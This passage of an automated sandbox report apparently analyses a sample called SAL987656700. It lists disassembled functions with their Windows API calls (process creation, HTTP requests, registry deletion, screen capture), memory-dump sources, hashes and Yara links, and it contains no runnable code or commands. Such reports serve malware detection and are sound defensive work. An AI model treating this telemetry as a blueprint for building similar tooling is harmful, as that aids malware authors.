                                        • Part of subcall function 008F05A7: GetStdHandle.KERNEL32(000000F6), ref: 008F05C6
                                      • _wcslen.LIBCMT ref: 0090B34B
                                      • _wcslen.LIBCMT ref: 0090B366
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0090B3B6
                                      • GetLastError.KERNEL32(00000000), ref: 0090B407
                                      • CloseHandle.KERNEL32(?), ref: 0090B439
                                      • CloseHandle.KERNEL32(00000000), ref: 0090B44A
                                      • CloseHandle.KERNEL32(00000000), ref: 0090B45C
                                      • CloseHandle.KERNEL32(00000000), ref: 0090B46E
                                      • CloseHandle.KERNEL32(?), ref: 0090B4E3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                      • String ID:
                                      • API String ID: 2178637699-0
                                      • Opcode ID: d70abcc2364782d0a2ca71a8d41032fd295d9feec2a8b9c2e4330b113a7e7a39
                                      • Instruction ID: d129d29f779fb57ecdbf59063c54ec87e20bad19d603ac4cd2ae348bc6dc0fc0
                                      • Opcode Fuzzy Hash: d70abcc2364782d0a2ca71a8d41032fd295d9feec2a8b9c2e4330b113a7e7a39
                                      • Instruction Fuzzy Hash: 26F17B716082409FCB14EF28C891B6EBBE5FF85714F18895DF8959B2A2DB31EC44CB52
                                      Function 0088326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemCount.USER32(00951990), ref: 008C2F8D
                                      • GetMenuItemCount.USER32(00951990), ref: 008C303D
                                      • GetCursorPos.USER32(?), ref: 008C3081
                                      • SetForegroundWindow.USER32(00000000), ref: 008C308A
                                      • TrackPopupMenuEx.USER32(00951990,00000000,?,00000000,00000000,00000000), ref: 008C309D
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008C30A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                      • String ID: 0
                                      • API String ID: 36266755-4108050209
                                      • Opcode ID: 0d7fa07c245e8e57a4db2c980ddf99c29ebfa232bb8f9223c3bf4dcf7ab05691
                                      • Instruction ID: 13a0650e79e2aed2ccb42327deafa337bbddb2f4da6e57811d080e82cacf5ecc
                                      • Opcode Fuzzy Hash: 0d7fa07c245e8e57a4db2c980ddf99c29ebfa232bb8f9223c3bf4dcf7ab05691
                                      • Instruction Fuzzy Hash: 84711771644209BEEB219F29DC49FAABF75FF01764F20421AF524EA1E0C7B1E910DB91
                                      Function 00916CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?), ref: 00916DEB
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00916E5F
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00916E81
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00916E94
                                      • DestroyWindow.USER32(?), ref: 00916EB5
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00880000,00000000), ref: 00916EE4
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00916EFD
                                      • GetDesktopWindow.USER32 ref: 00916F16
                                      • GetWindowRect.USER32(00000000), ref: 00916F1D
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00916F35
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00916F4D
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 2429346358-3619404913
                                      • Opcode ID: 25dc7cb58c7330f0ffc597f08e32a29ee1c183c2465f12230ffdd59e0f4a3a70
                                      • Instruction ID: 98f272b6b6e7a12d61641dd4ca543fb17061f2a6e872a1a11c0435ade4cdcdbc
                                      • Opcode Fuzzy Hash: 25dc7cb58c7330f0ffc597f08e32a29ee1c183c2465f12230ffdd59e0f4a3a70
                                      • Instruction Fuzzy Hash: 84718AB0644349AFDB21CF18DC58FAABBE9FB88304F04451DF99987261C770E946DB11
                                      Function 008FC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008FC4B0
                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008FC4C3
                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008FC4D7
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008FC4F0
                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 008FC533
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008FC549
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008FC554
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008FC584
                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008FC5DC
                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008FC5F0
                                      • InternetCloseHandle.WININET(00000000), ref: 008FC5FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                      • String ID:
                                      • API String ID: 3800310941-3916222277
                                      • Opcode ID: 0b310d6a00d04abed81cc243b509cc6eb4aa7c298ab973238545ab5f4d7407ee
                                      • Instruction ID: 2acc107d6cd43a378f4239b333c54aaa42d15b19741dea6ff9b50514e474c6f5
                                      • Opcode Fuzzy Hash: 0b310d6a00d04abed81cc243b509cc6eb4aa7c298ab973238545ab5f4d7407ee
                                      • Instruction Fuzzy Hash: 21513AB164460DBFDB218F74CA88ABB7BBCFB08754F008419FA45D6250DB74EA44EB60
                                      Function 0091856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00918592
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185A2
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185AD
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185BA
                                      • GlobalLock.KERNEL32(00000000), ref: 009185C8
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185D7
                                      • GlobalUnlock.KERNEL32(00000000), ref: 009185E0
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185E7
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,000000F0), ref: 009185F8
                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0091FC38,?), ref: 00918611
                                      • GlobalFree.KERNEL32(00000000), ref: 00918621
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00918641
                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00918671
                                      • DeleteObject.GDI32(?), ref: 00918699
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009186AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: b040e3c9b2692096bfa12f8156b4a850213075b0c67b62ebbbd0f6bb1de13971
                                      • Instruction ID: 06efb53a48bd96c642907bb0f710df15bbff27e06247742e828c54f759c846c8
                                      • Opcode Fuzzy Hash: b040e3c9b2692096bfa12f8156b4a850213075b0c67b62ebbbd0f6bb1de13971
                                      • Instruction Fuzzy Hash: 704136B1744208AFDB118FA5CC88EAB7BBDEB89B51F108058F915E7260DB309941EB20
                                      Function 008F14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 008F1502
                                      • VariantCopy.OLEAUT32(?,?), ref: 008F150B
                                      • VariantClear.OLEAUT32(?), ref: 008F1517
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008F15FB
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 008F1657
                                      • VariantInit.OLEAUT32(?), ref: 008F1708
                                      • SysFreeString.OLEAUT32(?), ref: 008F178C
                                      • VariantClear.OLEAUT32(?), ref: 008F17D8
                                      • VariantClear.OLEAUT32(?), ref: 008F17E7
                                      • VariantInit.OLEAUT32(00000000), ref: 008F1823
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 1234038744-3931177956
                                      • Opcode ID: 9c3aeca3dd754b6a1a86d3112dbed662e63f0a34fd0f1d559a9edf96176b3c8b
                                      • Instruction ID: 04e53a37537815baa663c9924ffeeeb90934c6bbf4d693ac294b004ca55806a5
                                      • Opcode Fuzzy Hash: 9c3aeca3dd754b6a1a86d3112dbed662e63f0a34fd0f1d559a9edf96176b3c8b
                                      • Instruction Fuzzy Hash: 60D1DE71A0411DDBDF04AF79D888AB9B7B6FF48704F148056E646EB591DB30EC40DBA2
                                      Function 0090B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 0090C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090B6AE,?,?), ref: 0090C9B5
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090C9F1
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA68
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0090B6F4
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0090B772
                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0090B80A
                                      • RegCloseKey.ADVAPI32(?), ref: 0090B87E
                                      • RegCloseKey.ADVAPI32(?), ref: 0090B89C
                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0090B8F2
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0090B904
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0090B922
                                      • FreeLibrary.KERNEL32(00000000), ref: 0090B983
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0090B994
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 146587525-4033151799
                                      • Opcode ID: 6263417d942ceac044eec31c0b8b1720c4e95939f4bc1bdb4ff09e5670045159
                                      • Instruction ID: e88b56bef57a0662ed542eecca414400ea28a7ee1ee279acad5379d01a275a61
                                      • Opcode Fuzzy Hash: 6263417d942ceac044eec31c0b8b1720c4e95939f4bc1bdb4ff09e5670045159
                                      • Instruction Fuzzy Hash: D9C18C31208201AFD714DF18C494F2ABBE5FF84318F14855CE5AA8B6A2CB75ED45CB92
                                      Function 0090255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 009025D8
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009025E8
                                      • CreateCompatibleDC.GDI32(?), ref: 009025F4
                                      • SelectObject.GDI32(00000000,?), ref: 00902601
                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0090266D
                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009026AC
                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009026D0
                                      • SelectObject.GDI32(?,?), ref: 009026D8
                                      • DeleteObject.GDI32(?), ref: 009026E1
                                      • DeleteDC.GDI32(?), ref: 009026E8
                                      • ReleaseDC.USER32(00000000,?), ref: 009026F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: 21baabb0a509e06dbff123ef8f596c60b68c460671c7afbc1a934812cd6d05bf
                                      • Instruction ID: 67a92bc8343359dc2f700488c27d27521bd9db9328b3a13bbd8ca023d3be9fe7
                                      • Opcode Fuzzy Hash: 21baabb0a509e06dbff123ef8f596c60b68c460671c7afbc1a934812cd6d05bf
                                      • Instruction Fuzzy Hash: E961F4B5E04219EFCF04CFA8D884AAEBBF5FF48310F24852AE955A7250D771A941DF50
                                      Function 008BDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 008BDAA1
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD659
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD66B
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD67D
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD68F
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6A1
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6B3
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6C5
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6D7
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6E9
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD6FB
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD70D
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD71F
                                        • Part of subcall function 008BD63C: _free.LIBCMT ref: 008BD731
                                      • _free.LIBCMT ref: 008BDA96
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008BDAB8
                                      • _free.LIBCMT ref: 008BDACD
                                      • _free.LIBCMT ref: 008BDAD8
                                      • _free.LIBCMT ref: 008BDAFA
                                      • _free.LIBCMT ref: 008BDB0D
                                      • _free.LIBCMT ref: 008BDB1B
                                      • _free.LIBCMT ref: 008BDB26
                                      • _free.LIBCMT ref: 008BDB5E
                                      • _free.LIBCMT ref: 008BDB65
                                      • _free.LIBCMT ref: 008BDB82
                                      • _free.LIBCMT ref: 008BDB9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 3c7b9a7111da753cabaad66ca859c32d0d99fe00c2cb7c0590ce51ce036f91da
                                      • Instruction ID: 679876610363265a5d2ea64d818cef61176d1e2f7c4714e98fe648019951a951
                                      • Opcode Fuzzy Hash: 3c7b9a7111da753cabaad66ca859c32d0d99fe00c2cb7c0590ce51ce036f91da
                                      • Instruction Fuzzy Hash: F0312C71644705BFEB21AA39E845FDABBE9FF10320F154819E449D7392EE31AC448725
                                      Function 008E365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 008E369C
                                      • _wcslen.LIBCMT ref: 008E36A7
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008E3797
                                      • GetClassNameW.USER32(?,?,00000400), ref: 008E380C
                                      • GetDlgCtrlID.USER32(?), ref: 008E385D
                                      • GetWindowRect.USER32(?,?), ref: 008E3882
                                      • GetParent.USER32(?), ref: 008E38A0
                                      • ScreenToClient.USER32(00000000), ref: 008E38A7
                                      • GetClassNameW.USER32(?,?,00000100), ref: 008E3921
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 008E395D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                      • String ID: %s%u
                                      • API String ID: 4010501982-679674701
                                      • Opcode ID: 2acb00c67b75e0538d53b3ace7b23d31af525091f2b7f563922eb5956c71efe7
                                      • Instruction ID: 5a2673dedc5a297b2d058a6e73716a680fa48e7a00d0a4aa59d85be6f28b1131
                                      • Opcode Fuzzy Hash: 2acb00c67b75e0538d53b3ace7b23d31af525091f2b7f563922eb5956c71efe7
                                      • Instruction Fuzzy Hash: F591D171204746AFD718EF26C889BEAB7A8FF46350F008529F999D3191DB30EE45CB91
                                      Function 008E4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000400), ref: 008E4994
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 008E49DA
                                      • _wcslen.LIBCMT ref: 008E49EB
                                      • CharUpperBuffW.USER32(?,00000000), ref: 008E49F7
                                      • _wcsstr.LIBVCRUNTIME ref: 008E4A2C
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 008E4A64
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 008E4A9D
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 008E4AE6
                                      • GetClassNameW.USER32(?,?,00000400), ref: 008E4B20
                                      • GetWindowRect.USER32(?,?), ref: 008E4B8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
